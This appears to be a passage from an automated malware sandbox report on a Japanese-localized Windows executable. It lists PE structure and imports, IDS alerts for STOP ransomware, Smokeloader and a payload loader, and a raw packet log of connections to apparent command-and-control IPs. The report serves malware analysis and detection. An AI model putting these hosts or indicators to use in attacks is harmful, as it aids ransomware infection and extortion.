                                                                                              • [ C ] VS2013 build 21005
                                                                                              • [C++] VS2013 build 21005
                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                              • [C++] VS2013 UPD5 build 40629
                                                                                              • [RES] VS2013 build 21005
                                                                                              • [LNK] VS2013 UPD5 build 40629
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x16a040x50.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x288c0000xd268.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x16a540x1c.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x15f600x40.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x100000x16c.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000xe3140xe400eaede8625fd2cd7a288d3a167584f805False0.6020250822368421data6.733553791725584IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x100000x72480x74008b25a86a077bad30a64de8a0e406b8ecFalse0.38190328663793105data4.838446131421907IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x180000x28733800x17a00f28c6f93d652eb00569398f38cc8cf5cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x288c0000xd2680xd4000c9e0cd40e057aa429c7fb34de41ecdcFalse0.3447449882075472data4.55857381397413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              AFX_DIALOG_LAYOUT0x28925a00x2data5.0
                                                                                              RT_CURSOR0x28925a80x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                                                              RT_CURSOR0x28928d80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                                                              RT_CURSOR0x2892a300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                                                              RT_CURSOR0x28938d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                                                              RT_CURSOR0x28941800x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                                                              RT_CURSOR0x28947180x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                                              RT_CURSOR0x28948480xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                                              RT_CURSOR0x28949200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                                              RT_CURSOR0x28957c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                                                              RT_CURSOR0x28960700x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                                                              RT_CURSOR0x28966080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                                                              RT_CURSOR0x28974b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                                                              RT_CURSOR0x2897d580x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                                              RT_ICON0x288c7000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0JapaneseJapan0.4349680170575693
                                                                                              RT_ICON0x288d5a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0JapaneseJapan0.5555054151624549
                                                                                              RT_ICON0x288de500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0JapaneseJapan0.5846774193548387
                                                                                              RT_ICON0x288e5180x568Device independent bitmap graphic, 16 x 32 x 8, image size 0JapaneseJapan0.6076589595375722
                                                                                              RT_ICON0x288ea800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0JapaneseJapan0.4437759336099585
                                                                                              RT_ICON0x28910280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0JapaneseJapan0.49366791744840527
                                                                                              RT_ICON0x28920d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0JapaneseJapan0.526595744680851
                                                                                              RT_DIALOG0x28985880x5adata0.8666666666666667
                                                                                              RT_STRING0x28985e80x36edataJapaneseJapan0.48177676537585423
                                                                                              RT_STRING0x28989580x68edataJapaneseJapan0.4296781883194279
                                                                                              RT_STRING0x2898fe80x27adataJapaneseJapan0.5
                                                                                              RT_GROUP_CURSOR0x2892a080x22data1.0294117647058822
                                                                                              RT_GROUP_CURSOR0x28946e80x30data0.9375
                                                                                              RT_GROUP_CURSOR0x28948f80x22data1.0588235294117647
                                                                                              RT_GROUP_CURSOR0x28965d80x30data0.9375
                                                                                              RT_GROUP_CURSOR0x28982c00x30data0.9375
                                                                                              RT_GROUP_ICON0x28925380x68dataJapaneseJapan0.6826923076923077
                                                                                              RT_VERSION0x28982f00x298OpenPGP Public Key0.5090361445783133
                                                                                              DLLImport
                                                                                              KERNEL32.dllGetProcAddress, GlobalAlloc, GetLastError, SetLastError, GetThreadContext, GetTickCount, CreateEventA, LoadLibraryA, LoadLibraryW, LoadLibraryExW, GetModuleFileNameW, GetSystemDirectoryA, GetTempPathA, CreateDirectoryW, SetFileAttributesW, GetVolumeInformationA, BuildCommDCBW, SetComputerNameExA, VerifyVersionInfoW, IsProcessInJob, SetVolumeMountPointW, GetLocaleInfoW, SetCalendarInfoW, GetNumberFormatW, GetStringTypeW, SetConsoleCursorInfo, AllocConsole, WriteConsoleW, AddConsoleAliasA, OutputDebugStringW, GetConsoleCP, FlushFileBuffers, IsBadStringPtrA, InterlockedExchange, EncodePointer, DecodePointer, ReadFile, RaiseException, RtlUnwind, GetCommandLineW, IsProcessorFeaturePresent, HeapAlloc, HeapFree, ExitProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, HeapSize, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, CloseHandle, SetFilePointerEx, GetConsoleMode, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetCurrentThreadId, GetProcessHeap, WriteFile, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, LCMapStringW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, HeapReAlloc, SetStdHandle, CreateFileW
                                                                                              USER32.dllGetSysColorBrush, DdeFreeStringHandle
                                                                                              GDI32.dllGetCharWidthW
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              JapaneseJapan
                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              05/25/24-21:29:44.396945TCP2036335ET TROJAN Win32/Filecoder.STOP Variant Public Key Download8049757213.172.74.157192.168.2.4
                                                                                              05/25/24-21:29:44.401863TCP2036335ET TROJAN Win32/Filecoder.STOP Variant Public Key Download8049758213.172.74.157192.168.2.4
                                                                                              05/25/24-21:30:00.599943TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978480192.168.2.4158.160.165.129
                                                                                              05/25/24-21:30:01.497363TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978780192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:57.239689TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4977880192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:40.316894TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4975280192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:45.087893TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4976180192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:44.285365TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4976080192.168.2.4213.172.74.157
                                                                                              05/25/24-21:29:38.780399TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974980192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:44.285365TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4976080192.168.2.4213.172.74.157
                                                                                              05/25/24-21:29:46.731629TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4976480192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:51.704930TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4977080192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:45.888233TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4976380192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:50.854256TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4976980192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:23.967892TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973780192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:37.997029TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974880192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:26.439461TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974080192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:28.810994TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974380192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:47.693105TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4976680192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:55.404520TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4977580192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:25.627974TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973980192.168.2.4158.160.165.129
                                                                                              05/25/24-21:30:14.919115TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4979780192.168.2.4158.160.165.129
                                                                                              05/25/24-21:30:22.918329TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4980280192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:54.574933TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4977480192.168.2.4158.160.165.129
                                                                                              05/25/24-21:30:25.031123TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4980580192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:41.205625TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4975480192.168.2.4189.163.126.89
                                                                                              05/25/24-21:29:41.205625TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4975480192.168.2.4189.163.126.89
                                                                                              05/25/24-21:29:59.082949TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978280192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:36.317305TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974580192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:28.037194TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974280192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:44.284933TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4975980192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:43.458282TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4975780192.168.2.4213.172.74.157
                                                                                              05/25/24-21:29:56.417456TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4977780192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:23.042406TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973680192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:27.244515TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974180192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:37.086113TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974780192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:58.049560TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978080192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:49.866228TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4976780192.168.2.4158.160.165.129
                                                                                              05/25/24-21:30:03.404543TCP2019714ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile4978980192.168.2.491.92.253.69
                                                                                              05/25/24-21:29:39.561780TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4975080192.168.2.4158.160.165.129
                                                                                              05/25/24-21:30:02.640033TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4978880192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:41.129515TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4975380192.168.2.4158.160.165.129
                                                                                              05/25/24-21:30:30.914264TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4981080192.168.2.4158.160.165.129
                                                                                              05/25/24-21:29:24.807766TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973880192.168.2.4158.160.165.129
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              May 25, 2024 21:29:23.036571026 CEST4973680192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:23.042032957 CEST8049736158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:23.042284966 CEST4973680192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:23.042406082 CEST4973680192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:23.046097040 CEST4973680192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:23.093955994 CEST8049736158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:23.139525890 CEST8049736158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:23.900290012 CEST8049736158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:23.902832985 CEST4973680192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:23.905308008 CEST8049736158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:23.905407906 CEST4973680192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:23.914585114 CEST4973780192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:23.961910963 CEST8049736158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:23.966736078 CEST8049737158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:23.966912031 CEST4973780192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:23.967891932 CEST4973780192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:23.967955112 CEST4973780192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:24.024707079 CEST8049737158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:24.072931051 CEST8049737158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:24.697138071 CEST8049737158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:24.701863050 CEST8049737158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:24.701966047 CEST4973780192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:24.701967001 CEST4973780192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:24.707103014 CEST8049737158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:24.793327093 CEST4973880192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:24.807547092 CEST8049738158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:24.807657003 CEST4973880192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:24.807765961 CEST4973880192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:24.808000088 CEST4973880192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:24.872095108 CEST8049738158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:24.922775030 CEST8049738158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:25.521806955 CEST8049738158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:25.522037029 CEST4973880192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:25.525528908 CEST4973980192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:25.530639887 CEST8049738158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:25.530709028 CEST4973880192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:25.577317953 CEST8049738158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:25.627414942 CEST8049739158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:25.627880096 CEST4973980192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:25.627974033 CEST4973980192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:25.628019094 CEST4973980192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:25.684750080 CEST8049739158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:25.735804081 CEST8049739158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:26.362864017 CEST8049739158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:26.363332987 CEST4973980192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:26.367712975 CEST8049739158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:26.368172884 CEST4973980192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:26.413799047 CEST8049739158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:26.434209108 CEST4974080192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:26.439210892 CEST8049740158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:26.439304113 CEST4974080192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:26.439460993 CEST4974080192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:26.439519882 CEST4974080192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:26.489588022 CEST8049740158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:26.539366007 CEST8049740158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:27.185319901 CEST8049740158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:27.185517073 CEST4974080192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:27.191229105 CEST8049740158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:27.191317081 CEST4974080192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:27.195816040 CEST4974180192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:27.239391088 CEST8049740158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:27.244296074 CEST8049741158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:27.244514942 CEST4974180192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:27.244514942 CEST4974180192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:27.244514942 CEST4974180192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:27.309333086 CEST8049741158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:27.359427929 CEST8049741158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:27.978342056 CEST8049741158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:27.982028961 CEST4974180192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:27.983061075 CEST8049741158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:27.983140945 CEST4974180192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:27.985302925 CEST4974280192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:28.031820059 CEST8049741158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:28.036931992 CEST8049742158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:28.037194014 CEST4974280192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:28.037194014 CEST4974280192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:28.037194967 CEST4974280192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:28.094082117 CEST8049742158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:28.143662930 CEST8049742158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:28.747720003 CEST8049742158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:28.747947931 CEST4974280192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:28.751291990 CEST4974380192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:28.754204988 CEST8049742158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:28.754277945 CEST4974280192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:28.799348116 CEST8049742158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:28.810687065 CEST8049743158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:28.810895920 CEST4974380192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:28.810993910 CEST4974380192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:28.810993910 CEST4974380192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:28.875555038 CEST8049743158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:28.924124956 CEST8049743158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:29.545032024 CEST8049743158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:29.549786091 CEST8049743158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:29.550020933 CEST4974380192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:29.665766954 CEST4974380192.168.2.4158.160.165.129
                                                                                              May 25, 2024 21:29:29.671713114 CEST8049743158.160.165.129192.168.2.4
                                                                                              May 25, 2024 21:29:33.337085009 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:33.389286995 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:33.389509916 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:33.389586926 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:33.441790104 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.543318987 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.545523882 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.545737028 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.553687096 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.553700924 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.553895950 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.560971022 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.614006042 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.655028105 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.657352924 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.657556057 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.661200047 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.665553093 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.665564060 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.665839911 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.673690081 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.674042940 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.677892923 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.718997002 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.742283106 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.756093025 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.756372929 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.757687092 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.760848045 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.761092901 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.765136003 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.766175032 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.766247034 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.767869949 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.769918919 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.770009041 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.772103071 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.774260044 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.774456024 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.776319027 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.785316944 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.785329103 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.785523891 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.785552979 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.785564899 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.785598040 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.790616035 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.790828943 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.869580984 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.870477915 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.870587111 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.872781038 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.874794006 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.874805927 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.874970913 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.877012014 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.877233982 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.877762079 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.879547119 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.879720926 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.881355047 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.881367922 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.881431103 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.886815071 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.887032986 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.887113094 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.974431038 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.978734970 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.978935003 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.979592085 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.981489897 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.981503010 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.981513023 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.981704950 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.981705904 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.985361099 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.987469912 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.987560987 CEST4974480192.168.2.4189.163.126.89
                                                                                              May 25, 2024 21:29:34.990823030 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.990834951 CEST8049744189.163.126.89192.168.2.4
                                                                                              May 25, 2024 21:29:34.990839958 CEST8049744189.163.126.89192.168.2.4
